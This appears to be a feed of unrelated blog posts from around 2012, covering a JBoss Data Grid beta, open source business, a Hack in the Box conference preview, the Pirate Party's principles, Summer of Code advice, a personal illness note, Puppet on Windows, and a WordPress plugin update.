• A schema-less key value store: Red Hat JBoss Data Grid 6 beta is a NoSQL data store that provides flexibility to store any type of data.
• Compatibility with many types of applications: JBoss Data Grid 6 beta works with applications written in Java, C#, Spring, and others; deployed in an application server or standalone.
• Reliable grid-based data storage: Red Hat JBoss Data Grid 6 beta is designed to easily distribute data across multiple nodes. Data can be replicated in memory, written to disk, or stored in a relational database for fault-tolerance.
• Elastic scaling: JBoss Data Grid 6 beta allows simple addition and removal of storage nodes without disruption.
• Multiple access protocols: Red Hat JBoss Data Grid 6 beta provides easy access to the data grid using REST, memcached, Hot Rod, or simple map-like API.

Ref  : http://www.redhat.com/promo/dg6beta/

BR

Frederic

For many years now, developers around the world have celebrated and promoted the numerous benefits that open source has to offer IT and business communities. Despite the flare for technology innovation and bringing new offerings to market, the real value of the open source community is the culture of the people that represent it. A shared ethos, coupled with a collaborative working model and mutual respect has delivered and will continue to deliver cutting edge software offerings that are increasingly competing with traditional proprietary vendors.

But open source has moved beyond simply being a novelty or hobby, as its potential for huge cost reductions and delivering significant savings to the bottom line have become recognized by hard pressed businesses around the globe. Implementations of open source projects can also now be found in many countries in the government sector, with the UK, US, and France being notable examples. Only recently, it was announced that Iceland was shifting over to an open source model to help make savings and reduce the deficit.

For those of us working in the community, the only surprise with these headline-grabbing government sector implementations was that they weren’t happening faster.

When making the case for open source, despite the numerous benefits on offer, it’s vital that providers demonstrate they have the same structure and ecosystems you would expect from a major proprietary software vendor. In this context, open source offerings need to be appropriately packaged up with hosting, consultancy and the support network that many IT decision-makers consider to be a necessity for implementation. That’s why I founded Acquia, which serves as a commercial vehicle for enabling Drupal open source adoption into enterprise-size organizations, offering support and service level agreements that enterprise users expect.

But the open source community has recently seen two major developments that have fundamentally changed the perception of everything we have to offer. The first being Red Hat reaching the $1 billion USD revenue mark, which provided a huge confidence boost to open source developers that their business model is profitable and can be successful. This landmark achievement will open the floodgates to more developer-focused organizations achieving unprecedented success and puts further pressure on the traditional proprietary vendors that have dominated the IT landscape for so long.

Another landmark announcement is that Microsoft has chosen to move into the open source space, a signal of just how seriously the value of community development has become. Some expected this news to be met with a negative reaction, but the open source community should celebrate the fact that a large proprietary software organization is investing in open source and extend a warm welcome to Microsoft.

With businesses looking for IT solutions that can deliver both innovation and cost savings, there has never been a more exciting time to be involved in open source. With open source businesses reaching the $1billion dollar revenue mark and leading proprietary firms opening up new subsidiaries to invest in open source, the open source community should feel that the best days are still yet to come. Once a fast growing self-contained community, open source is now recognized as a genuine alternative to proprietary software with a serious offering that will empower businesses across the globe.

Dear all,

I am going to do a presentation about “JBoss EAP 6” in Luxembourg in April 2012.
If your company or you are based in BeNeLux and are interested by this presentation, just let me know and I will try to arrange a meeting for you.

Ref  : http://www.redhat.com/promo/eap6beta/

BR

Frederic

Some news about the upcoming edition of the “Hack in The Box” security conference. This third edition (already!) will be held at a new venue: The hotel Okura in the center of Amsterdam. Apart of trainings, the conference itself will be organized during two days (May 24th – 25th) and propose a quad-tracks schedule. You can already have a look here (warning, this is still a draft version). Two great keynote speakers were already announced: Andy Ellis, Chief Security Officer of Akamai on day 1. Bruce Schneier (do we need to present him again?) on day 2. Based on the current agenda, here is my wishlist:

• Turning Android inside-out (forensics)
• One flew over the cuckoos nest (automatic malware analysis)
• Whistling over the wire (Twitter & URL shorteners security)
• Security threads in the world of digital satellite television (set-top-boxes security)
• PostScript – danger ahead
• Automatically searching for vulnerabilities (taint analysis)
• Bypassing the Android permission model (mobile security)
• Attacking XML processing
• Smashing VMDK files for fun and profit (virtualization)

The CFT contest is also back but in a new format called “Bank0verflow“.  Based on both attack and defense modules, it will see teams of three provided with a set of custom vulnerable services and web applications. Teams need to exploit their rivals’ machines to retrieve pre configured flags to score offensive points and obtain defensive points by keeping their own vulnerable services running. Another new “event in the event“: The Hackaton will be organized for the first time in Amsterdam. The principle is simple: put hackers in a room and let them write some code during 12 hours. The topic of this edition is the implementation of a proof of concept to problems related to browsers and their extensions. First price will be: 1337 EUR in cash!

A few words about the talks, the proposed topics are not only focusing on classic computers but also other electronic devices that we use daily. Adam Gowdiak will present his researches about  security flaws in digital satellite TV set-top-boxes and DVB chipsets used by many satellite TV providers worldwide. The hackers (aka “iOS Jailbreak Dream Team”) who released the jailbreak of Apple’s popular iPhone 4S and iPad 2 devices will also be there to present their research.

Finally, SIGINT sessions (15-30 minutes max) will be organized during coffee & lunch breaks to let other people to present their project or researches. During one of those sessions, I’ll present my tool pastemon and the associated blog leakedin.com. This will be my (very small) contribution to this event.

I’ll attend the conference and write a wrap-up. Feel free to ping me if you want to meet…

Suite à ses récents succès en Allemagne, où il pourrait devenir la troisième force politique nationale, le Parti Pirate fait beaucoup parler de lui.

Mais comment considérer sérieusement un parti qui est né sur le désir de télécharger de la musique et qui, à première vue, n'est qu'un parti de défense des droits des internautes ?

En fait, réduire le parti Pirate au téléchargement reviendrait à considérer que les partis écologistes ne cherchent qu'à protéger les pandas d'Asie. Caricaturer le Parti Pirate en un groupuscule de geeks barbus est également mensonger: j'en connais deux qui se rasent.

Précisons tout d'abord que chaque citoyen est un internaute de fait. Que ce soit directement ou indirectement, toute personne est appelée à utiliser internet ou, tout au moins, à y avoir des données personnelles. Même votre arrière-grand-mère est probablement dans un album photo en ligne et, à ce titre, liée à internet. Dire que le parti Pirate est un défenseur du droit des internautes n'est donc pas faux mais il serait plus exact de dire: « défenseur du droit des citoyens ».

Enfin, contrairement à ce qu'on pourrait croire à première vue, le téléchargement de musique n'est pas le cœur du problème. Il s'agit uniquement d'un symptôme. Et ce symptôme est révélateur d'un problème beaucoup plus profond de la société actuelle : la confiscation du pouvoir des individus par des entités comme les grandes sociétés privées ou les organismes gouvernementaux.

Ce que la polémique du téléchargement a mis en lumière est que les gouvernements étaient prêts à bafouer des libertés et des droits fondamentaux des citoyens uniquement pour préserver certains intérêts privés. La démocratie glisse doucement vers la ploutocratie et les récentes crises bancaires ne sont finalement qu'une autre facette de la même question.

Ce profond problème de notre société s'illustre de différentes façons, que ce soit à travers les brevets ou la propension des gouvernements à donner l'argent public à des entreprises privées sous prétexte de « créer des emplois ». Les conséquences de la crise économique ont également mis en exergue la déconnexion totale entre le pouvoir et le peuple au service duquel ledit pouvoir devrait être.

En Belgique, on constate même une certaine confiscation de la démocratie au profit d'une caste politique peu renouvelée et opaque. Nos élus cultivent la tradition du secret, même lorsqu'il s'agit de négocier un gouvernement chargé de nous représenter. Fait paradoxal pour une démocratie, le peuple est de plus en plus écarté de ce qui a trait au pouvoir. Des manifestations, des pétitions, des mouvements de masse ou le lobbying intensif deviennent les seules armes pour se faire entendre, donnant voix à celui qui crie le plus fort ou finance les campagnes de lobbying les plus coûteuses.

Les principaux partis belges ont été de grands artisans de la démocratie et de la liberté. Leur apport a été fondamental au cours de notre histoire. Grâce à eux, je suis en mesure d'exprimer aujourd'hui mes idées, librement et sans crainte. Mais le monde change, de plus en plus vite. La technologie permettrait beaucoup d'améliorations positives, de simplifications, de transparence. Force est de constater que, jusqu'à présent, aucun parti n'a fait montre d'une réelle compréhension de cette évolution et semble s'accrocher à toute opportunité de pouvoir plutôt qu'à une réelle volonté de progrès.

Face à cela, le credo du Parti Pirate est simple: rendre le pouvoir aux citoyens, remettre le gouvernement au service des individus et non l'inverse. Par défaut, faire confiance aux citoyens et, sauf preuve du contraire, les considérer de bonne foi. Les initiatives comme Wikipedia ou OpenStreetMap ont apporté la preuve qu'il était souvent plus productif de corriger les erreurs de quelques moutons noirs que de mettre des barrières à tout le monde.

De ce credo du pouvoir rendu au citoyen découlent huit grands principes fondamentaux, regroupés sous l'appellation « La roue des Pirates »^[1].

1. Vie privée

Chaque individu a droit au respect de sa vie privée, de sa correspondance, de ses données, de sa position. Sans le droit à la vie privée, un gouvernement dispose d'un pouvoir disproportionné sur les individus.

2. Transparence

Le secteur public, les élus et le gouvernement sont payés par les citoyens. De ce fait, le citoyen devrait avoir accès de manière transparente et compréhensible à toutes les décisions, à tous les détails, à tous les documents. Le gouvernement est responsable devant les citoyens.

3. Ticks - ( Tools Ideas Culture Knowledge Sentiments)

Les outils, les idées, la culture, la connaissance et les sentiments doivent pouvoir être partagés et échangés sans restriction. Les citoyens doivent avoir le pouvoir de s'auto-éduquer, de s'informer.

4. Humanisme

Tous les êtres humains naissent égaux et disposent des mêmes droits. Le gouvernement ne peut catégoriser ou discriminer certains groupes d'êtres humains.

5. Diversité

La société est fondamentalement multi-culturelle dans tous ses aspects: technique ou éducationnel. Aucune culture n'est privilégiée. Se revendiquer d'une culture ou d'une autre est le propre de l'individu et ne donne lieu à aucun droit ou devoir supplémentaire.

6. Résistance

La société doit être conçue pour résister aux possibles abus ainsi qu'aux problèmes prévisibles. Cela implique une décentralisation, tant technique que politique, ainsi que la mise en place de solutions durables.

7. Économie dégroupée

Les individus sont responsables de la production de richesse et non les grandes sociétés. Les citoyens doivent donc avoir le pouvoir de travailler à leur convenance, de voir leur travail encouragé et valorisé, qu'il soit bénévole ou non.

8. Une législation de qualité

Les lois doivent être nécessaires, proportionnées et efficaces. Elles doivent répondre à un problème clairement identifié, elles doivent résoudre ce problème et ne doivent pas créer de problèmes plus importants. Cela implique une analyse non-idéologique et rationnelle.

Ces principes gouvernent la pensée pirate à travers le monde et cherchent à donner la base d'un cadre de réflexion qui soit avant tout pragmatique et efficace plutôt qu'idéologique.

Bien entendu, cette réflexion est fort théorique et beaucoup de réactions aimeraient voir des propositions concrètes sur l'emploi, la sécurité ou l'environnement.

Plutôt que de promettre tout et n'importe quoi, le Parti Pirate se concentre donc sur certains problèmes clairement identifiés (la réforme du droit d'auteur, du système de brevet) et sur la mise en place de plate-forme de « démocratie liquide », afin de permettre à chaque citoyen d'être entendu, de proposer des idées et d'avoir une influence sur les sujets qui lui tiennent à cœur.

La roue des Pirates peut également donner naissance à beaucoup d'idées^[2] mais il est du ressort des candidats d'exprimer leurs propositions concrètes et de laisser les électeurs décider.

Le populisme, le clientélisme et l'action à court terme sont les maux de nos démocraties modernes. Je suis intimement convaincu que la vision du Parti Pirate est la première étape vers la démocratie du troisième millénaire, une démocratie ou la liberté individuelle et l'efficacité pragmatique au service du citoyen supplanterait l'idéologie et l'électoralisme.

Voter Pirate, c'est donner du poids à un idéal de démocratie moderne. Et si vous militez dans un autre parti, n'hésitez pas à pirater ces idées. Les idées sont faites pour ça.

Images par PIRATEN, Piratenpartei Heilbronn, bookish in north park , Damien Clauzel

For several years now, I've been a Summer of Code mentor for Getting Things Gnome, under the GNOME umbrella.

This year again we received plenty of student proposals. GTG being a very small part of the GNOME project and having only few mentors available, we had to choose. That choice was sometimes really hard and it's a pity to see some students not being selected.

In order to help them for next year, I would like to point what we, potential mentors, expect from the students.

Programming knowledge

Summer of Code's primary purpose is programming. We expect candidates to have a somewhat good knowledge of the programming language used in our project. We have seen very bright students with very interesting ideas. But it quickly appeared that they were not comfortable enough with Python.

Accepting such a student could only lead to a failure. Every little problem which is trivial to an experienced programmer might become a blocker. More importantly: we are not programming mentors. Programming is obvious to us and is a pre-requisite.

Project ownership

Each year, GTG developers put some SoC ideas on the GNOME wiki. Retrospectively, I think it's a bad thing. Indeed, we receive plenty of proposals from students who simply copy/paste our ideas. Sometimes, they don't even understand it and have no clue of what GTG is.

We expect students to become owners of their project. The best way to achieve that is to have the student come with his own idea, to scratch his own itch. Of course, this could be discussed with the team and potential mentors but the initiative itself should come from the student.

Originality

Another reason why taking a SoC idea from the wiki is bad is because we end with ten identical proposals. We then try to find the most skilled student but we usually found that the best students came with their own, original project.

If you want to succeed as a student, be original and show that you understand what you want to achieve. Ask you the question: "Why was it not done before me and why can I succeed where nobody has been before?".

Early start

Next year, during the student proposal period, I plan to not answer emails from students with whom I had no prior contacts. As I'm listed as a possible mentor, each year I see my inbox filled with requests from students that particular week. All those mails are kind, polite but are basically asking "please tell me what to write on my proposal and support my candidacy".

Sorry but that week is not a good time to approach a mentor. A mentor is busy, have a work, a family and cannot handle twenty students requests in a few days. Remember that a mentor is not paid and that writing the proposal is your job.

But the secret here is very simple: start early. Be involved very early in the project you target. Get in touch with the team. Fix some easy bugs. Learn the project.

If you don't have the time or the motivation to do that in the months prior to the Summer of Code, there are chances you will not be a good student anyway.

But if you are known to the team, if we have seen you at work, we will probably want you as our student.

Initiative

Never send an email to a possible mentor vaguely asking what to do. We want to see initiatives. Try to find a mentor several weeks before the proposal period. Come with a well structured idea and ask for a critical review of your project. Seek critics, not advices.

When the submitting time start, immediately post your proposal. Don't wait. You will always be able to correct or edit your proposal. You will immediately get feedback from mentors so don't waste time trying to get private feedback before posting.

Also, in the first days, there's usually few proposals posted. Mentors take time to review them and post comments. After one week, there could be tenth of proposals and nobody review them all anymore.

Multiply your chances

You can post multiple proposals in different organisations, you have nothing to lose doing so. It's specially interesting if your project could be under different umbrellas. For example, a proposal about a video chat client could be adapted for GNOME, Gstreamer or even XMPP.

Conclusion

Being accepted as a GSoC student doesn't require you to be good enough. You need to convince us that you are the best.

Doing so is never, never, never done by writing an impressive list of skills or telling us that you were the leader of your football team. All we need to see is your code, your idea and your planning skills.

If you were not accepted this year and plan to try again next year, start to code now. Start to learn, start to contribute.

And don't send me an email asking me what to do. My answer is already written hereabove.

Picture by Seema K K, Mypouss and Fred Dhennin

Na 7 jaar professioneel leven zonder een dag ziekteverzuim hebben de virussen en bacteriën me er uiteindelijk toch onder gekregen.

Momenteel verwerk ik mijn vierde keelontsteking in drie maanden tijd, met tussenin nog een weekje hoestbuien (”genre TBC” volgens een collega).

De dokter vermoedt ‘hyperreactiviteit’. Kort gezegd is dat een ander woord voor ‘heel snel ziek’ .
Blijkbaar een soort van allergische reacties van de slijmvliezen, zonder echt voor iets specifiek allergisch te zijn. En die ontstekingen – keelpijn, pijnlijke amandelen en een drukkend gevoel op de oren – zijn daar gewoon een neveneffectje van.

Het vreemde is dat ik me ’s ochtends meestal kiplekker voel, om dan geleidelijk aan de dag door te strompelen en ’s avonds als een slappe vod in de zetel te eindigen.

De pillen en sprays van de dokter slagen er goed in om de symptomen weg te werken, maar doorgaans begint de miserie een week nadien gewoon opnieuw. Best vermoeiend op den duur…

At a customer, I've migrated a number of manually-maintained servers to having them be maintained through puppet not so long ago. Since then, some more machines have been added, and getting them up and running properly was a breeze: do a base install, install puppet, sign the certificate, restart puppet, and then wait and twiddle thumbs while puppet did its magic. Easy as pie.

Now, a few months later, we needed to install a number of windows machines for a lab (not my choice), and the person involved asked me to figure out some diskspace so we could start creating images for those.

Not a chance.

Instead, I suggested looking for a configuration management system, similar to puppet. Since we're using Samba 3 to run the Windows network here, dropping everything in Active Directory was not an option. But a short while later, he came back with the note that puppet, in its 2.7 version, actually does support Windows as a platform for the managed machines.

Interesting.

The unfortunate bit was that puppet supports creating files and installing software when it is distributed as an MSI file, but not when it's distributed as a .exe file. This is not unexpected; MSI files can be installed noninteractively; but when something is distributed as a .exe file, it means it needs to be installed interactively; and puppet does not have the ability to interact with GUI software.

The workaround: use something that does have that ability (in my case, autoit), and use an exec block in puppet to make it call those scripts. In effect, that's a bit like screenscraping. Add a creates stanza to the block, so that the installer isn't started again if the software at hand has already been installed. This 'autoit' thing also comes with a recording utility, allowing one to create an initial script by just doing the installation, and having the tool just record stuff.

With that, the machines are installed 99% automated. I say 99%, because there are still some issues:

• Some software ships with an embedded google toolbar and an embedded google chrome. Not only do we not want that, it also makes automatic installation a Very Hard problem: if you install the software the very first time, it asks you whether you want to install Google Toolbar. If you decline, the rest of the installation is shown, and a registry key is set. If you then uninstall and reinstall, the Google Toolbar question isn't shown; instead, the Chrome question is shown. If you decline that, then the same happens with a different registry key.
  Google doesn't actually document where these keys are set, or how it can be disabled for any software that might possibly have embedded toolbars or browsers. Or, well—if it does document it, I certainly didn't find any documentation about it; the fact that google tells me "you're running Linux, you don't need Google Toolbar, go fuck yourself" when I go to the toolbar.google.com website isn't very helpful.
  Anyway, the keys are under HKLM\Software\Google. You can't miss them.
• This being Windows, sometimes the machine needs to be rebooted after an installation. The Windows Installer software, msiexec.exe, signals this fact by exiting with an exit state of 3010. Unfortunately, puppet doesn't understand that, causing it to mark the installation as failed, and retrying it on the next run. That's annoying.
• Sometimes, telling the machine to postpone rebooting causes the next installation to behave slightly differently, which will cause the autoit script to fail. When that happens, I need to kill autoit, exit the installer for the failed application, and allow puppet to finish. After that, and after a reboot of the machine and restart of puppet, everything works well.
• To be able to install software, Windows may sometimes need to kill some applications, or may need to take focus. This may interfere with the lab readings these machines will be used for, so is not an option. Instead, I've decided not to ever run puppet agent as a service, instead always calling it manually with the '--onetime' option, so it quits once the manifest is applied. Unfortunately, that makes it harder to update things; I'll have to walk by each and every one of the machines if I ever need to add something. I did consider adding that to a login script, but then the user logging in to the machine will most likely not ever have the required privileges to actually do what puppet needs done.

I'll have to think about this some more, I guess. First, it's clear that while puppet does have some Windows functionality, it's not entirely ready yet. And somehow, using autoit to add to Puppet functionality feels like an ugly hack.

We'll see what the future brings.

I’m not a developer, I’m just a random guy who was lucky enough to be around when the web started to happen, back in the nineties. And over the years I might have learned a bit about web development, but still I’m not a real developer. And yet, there I am with two WordPress plugins, fiddling with PHP and JavaScript. I’ll let you in on what’s not really a secret; I’ve made some ridiculous mistakes while coding those plugins. Trial and error, you know. Testing, fixing, releasing and getting feedback. Especially getting feedback!

Real users telling me it doesn’t work, asking for extra features or making proposals to make it better overall, that what I thrive on. The latest example; JavaScript namespaces. Not being a developer means that I know as much about coding patterns as I know about cows. I just hit the keyboard real hard and hope the browser understands what I throw at it. Until a good friend told me to use JavaScript namespaces, to avoid conflicts with other people’s JavaScript. And a week later someone wrote my software just didn’t work any more and I had to start digging and found a JavaScript conflict that was introduced with a new version of AddThis

And those are the moments one grows, as a developer; you start searching for information about scope, anonymous functions and namespaces. You try, it doesn’t work and you dig some deeper, until you stumble on a great question and answer on Stack Overflow with a link to a very detailed article about JavaScript coding patterns. So you go back into ‘vi’ and start changing the code once again and than all of a sudden you have a working version, which your Polish user confirms fixes the problem and you learned a lot while bugfixing.

So kudo’s to all you guys & girls for the great feedback, you rock! Here’s WP YouTube Lyte version 1.1.3 to thank you.

Possibly related twitterless twaddle:

• Fiesta: WP YouTube Lyte reaches 1.0.0
• It’s official: you can not track your visitors
• Venus doesn’t love noscript